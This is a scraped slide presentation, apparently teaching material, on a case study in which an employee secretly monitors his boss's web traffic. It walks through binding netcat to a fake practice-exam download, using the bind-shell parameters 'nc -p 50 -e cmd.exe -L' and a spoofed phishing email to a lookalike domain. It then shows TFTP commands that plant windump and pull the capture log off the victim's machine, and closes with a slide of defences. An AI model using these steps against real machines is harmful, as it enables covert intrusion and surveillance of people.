Download presentation
Presentation is loading. Please wait.
Published byKristin Butler Modified over 8 years ago
1
What’s the Boss viewing?
2
The Boss established a new policy against surfing the web during work hours Phoenix decides to examine the sites that the Boss is looking at by spying on him
3
The networked machines are connected via a switch ◦ Private 192.168.1.0 network Boss’ IP:192.168.1.5 Phoenix’s IP:192.168.1.6
4
Monitor traffic to and from the Boss’ machine How “loud” should this approach be? ◦ Loud/noisy means that could trigger alarms of IDS/IPS systems Might be reasons to launch a noisy attack Provide a distraction to another attack Sometimes it’s the only way to monitor traffic Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done
5
“Loud” methods ◦ Gratuitous ARP for individual hosts ARP Poisoning ◦ MAC spoofing ◦ MAC flooding ◦ SPAN Port mirroring
6
Gratuitous ARP ◦ Unsolicited ARP Protocol allows for it, without checking for the ARP request (stateless!) ARP reply sent out associating the target’s IP with the collector’s MAC address Spoof the MAC of the gateway ◦ Collector replies to ARP requests for the gateway’s MAC ◦ Switch will see the router’s MAC address on both switch ports will send outbound traffic to both ports MAC flooding ◦ Overwhelm the switch’s MAC table Causes the switch to “failover” into hub mode MACOF (http://monkey.org/~dugsong/dsniff/)
7
Capture the traffic on the target host itself ◦ Plant WinPCap and Trojan Horse on the host The trick will be to install the software on the target host ◦ Boss will not blindly install software Have to convince him it’s something of value to him The plan consists of a chained series of exploits
8
Copy a web site and host it on Phoenix’s server Bind Netcat to a legitimate executable file Send email to boss ◦ Download the free executable Netcat will also be downloaded and installed Connect to boss’ machine using Netcat Use TFTP and download a WinDump program onto boss’ machine Capture the boss’ network traffic Analyze captured traffic Rebuild a jpg image using a hex editor
9
Phoenix locates a site and plans to get his boss to visit a copied version of the site ◦ Lays the groundwork via some social engineering Tells boss of a site “certificatepractice.com” which offers free CCNA practice exam as a promotional offer ◦ Uses a utility to download and mirror the site Wget (www.gnu.org/software/wget)www.gnu.org/software/wget Copy the site recursively to hard drive, with appropriate level of hyperlinks of the 1 st page Will also copy the practice test executable Phoenix will bind his Trojan to this executable
10
Trojan wrapper program is used ◦ YAB (Yet Another Binder) Areyoufearless.com (no longer there, however can get via BitTorrent sites) Altavista.net Packetstormsecurity.org Add Bind File option Allows Phoenix to bind nc.exe Will execute nc (asynchronously is possible) Can add execution parameters when nc starts up Np 50 –e cmd.exe –L Registry startup option available (default is no) Melt stub option Will remove netcat after execution Icon can be added to make the install appear legitimate
11
Overwrite the original ccna.exe file with the bound Trojan file in the phony site Register a very similar domain name ◦ “certification - practice.com” Send an email to victim ◦ Phoenix uses an anonymous e-mailer and spoofs the email header to have the “From:” appear as the real site www.mail.com www.mail.com Doesn’t require a “real” email address to register Victim would have to read the email message headers in order to see the real source domain
12
Check for spelling and grammatical errors Offer something free or trial basis Appeal to greed ◦ Why victim is getting something for nothing Lower suspicion Appeal to victim’s sense of self ◦ Self-help tools, adding to success, etc Brevity Text of the email contains the link to the site ◦ Appears as the URL of the real site, but the hyperlink is really the phony site Present the email to the victim ◦ Possibly prepare the victim for the email, adding to the enticement
13
Angry IP Scanner ◦ www.angryziber.com/ipscan/ www.angryziber.com/ipscan/ Scan IP’s on the network for the IP with port 50 open and listening
14
nc to the victim’s machine on port 50 Verify the connection using ipconfig ◦ Will show the victim machine’s IP in the nc window
15
Use command line utility ◦ nc does not allow for usage of a GUI (Windows) interface Sysinternals has a TFTP server available ◦ Free ◦ No configuration required ◦ Windows already has a TFTP client! Windump is downloaded ◦ www.winpcap.org/windump www.winpcap.org/windump ◦ Placed into the default TFTP server directory (TFPT-Root) Phoenix sets up a TFTP server on his machine Using Netcat, Phoenix types tftp –i 192.168.1.6 get windump.exe windump.exe tftp [-i] host [put | get] source destination -i switchuse binary transfer
16
Options ◦ -ccount (packets) ◦ -ssnaplength (length of packets captured) ◦ -wfilename (of captured packets) windump –c 500 –s 1500 –w capture.log If the victim does not have winpcap installed, Phoenix must transfer and manually install winpcap on victim machine ◦ Windump requires winpcap
17
Phoenix downloads winpcap Unzips it TFTP (to victim’s winpcap directory) ◦ Daemon_mgm.exe ◦ NetMonInstaller.exe ◦ Npf_mgm.exe ◦ Rpcapd.exe ◦ Uninstall exe Execute Npf_mgm.exe –r Daemon_mgm.exe –r NetMonInstaller.exe i
18
Using Netcat tftp –I put 192.168.1.6 capture.log Use a packet analyzer to view the traffic ◦ Wireshark A review show sites visited by the victim ◦ Includes a GET (HTTP) for a file called “gambling.jpg” Follow TCP stream ◦ Capture the output as raw data ◦ Use a hex editor (WinHex), if required, to edit the raw data Remove everything before the actual binary file (HTTP commands, etc) Leaves just the actual binary of the image Jpg starts with ÿØÿà
20
Anonymous note left on the victim’s desk highlighting the activity Internet usage policy relaxed the next day
21
Phishing ◦ Training! ◦ Spam filters / phishing filters Trojan horse ◦ Anti-virus software Latest signatures ◦ However Organizations will alter the Trojan (for a price) so that it does not match a signature EliteC0ders (no longer offers this “service”) ◦ Software policy ◦ Sniffing Port security on switches Protects against ARP poisoning, MAC spoofing and MAC flooding IPS PromiScan Host based IDS Cisco Secure Agent Warns if new application is launching
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.